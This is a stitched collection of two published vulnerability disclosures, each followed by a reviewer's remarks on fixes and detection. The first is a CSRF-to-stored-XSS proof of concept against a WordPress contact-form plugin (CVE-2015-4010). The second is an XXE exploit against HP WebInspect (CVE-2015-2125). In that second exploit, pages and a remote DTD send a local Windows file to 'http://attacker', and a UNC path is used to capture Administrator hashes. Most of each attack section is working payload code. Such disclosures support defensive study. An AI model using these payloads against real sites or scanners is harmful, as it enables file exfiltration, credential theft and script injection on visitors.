# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: CVE-2015-4010
## Product Information:
Secure contact form for WordPress. Uses end-to-end encryption to send user
information. Not even your hosting provider can view the content.
Let users send you information in a secure way. Uses I.CX messaging service
to encrypt user content in their own web browsers before sending to you.
## Vulnerability Description:
The forms in the admin area of the plugin are vulnerable to CSRF, via which
the contact forms generated are susceptible to XSS via unsanitized POST
parametre.
For example, the admin function of updating an existing form can be done
via CSRF. Hence, by submitting a crafted HTML string in the parametres via
CSRF, a XSS attack gets launched which affects all the visitors of the
page(s) containing the contact form.
## Proof of Concept:
<form action="http://localhost/wp-admin/options-general.php?page=conformconf";
method="post">
<input type="hidden" name="name" value="required" />
<input type="hidden" name="email" value="optional" />
<input type="hidden" name="phone" value="off" />
<input type="hidden" name="message" value="required" />
<input type="hidden" name="display_name" value="Example" />
<input type="hidden" name="recipient_name" value="example" />
<input type="hidden" name="cfc_page_name" value="" />
<!-- Wordpress page-id value -->
<input type="hidden" name="existing_page" value="28" />
<input type="hidden" name="cfc_selection" value="upd" />
<input type="hidden" name="iframe_url"
value=""></iframe><script>alert('XSS!');</script>"
/>
<input type="submit" value="Update Page">
</form>
## Solution:
Upgrade to v1.1 of the plugin.
## Disclosure Timeline:
2015-03-26 - Discovered. Contacted developer on support forums.
2015-03-27 - Contacted developer via contact form on vendor site.
2015-04-01 - Fixed v1.1 released.
2015-05-15 - Published disclosure on FD.
2015-05-16 - CVE assigned
## References:
CVE Assign - http://seclists.org/oss-sec/2015/q2/471
http://packetstormsecurity.com/files/131955/
https://wpvulndb.com/vulnerabilities/7992
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
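Review bot: the form `action` on the first PoC line carries a stray `;` after the closing quote ("...page=conformconf";), which browsers tolerate but which should be removed for an accurate PoC. Otherwise the header is complete (fixed version v1.1, CVE-2015-4010, link to the code diff). The root cause is two-fold as described: no nonce on the admin form handler and `iframe_url` rendered unescaped into the public contact form; the fix is check_admin_referer()/wp_nonce_field() on the handler and esc_url()/esc_attr() on output, and upgrading to v1.1. Since the payload is stored in the published page, scanning rendered contact-form pages for unexpected `<script>` tags after a suspicious POST to options-general.php?page=conformconf is a practical detection.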

platforms/xml/webapps/37250.txt Executable file

@ -0,0 +1,41 @@
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125
1. Create website that exploits vulnerability.
1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">
1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>
<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>
</body>
</html>
1.2.2. Attacker needs to start tool on the server that captures hashes.
2. Exploit is triggered while profiling or scanning created application using vulnerable versions of HP WebInspect.
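Review bot: the header lists affected versions up to 10.4 and CVE-2015-2125 but no fixed version or vendor bulletin, which an entry about a security scanner should cite. Both PoCs rely on the scanner's XML parser resolving external parameter entities while profiling or scanning a crawled application: the first loads a remote DTD (file.xml) that sends a local file's contents to http://attacker, the second makes the scanner open a UNC path on the attacker's host. The product-side mitigation is to disable DTD and external entity resolution when parsing crawled content; on the operator side, run WebInspect from a host with no outbound SMB and restricted egress, and treat outbound SMB connections or unexpected HTTP fetches from the scanner host during a scan as an indicator.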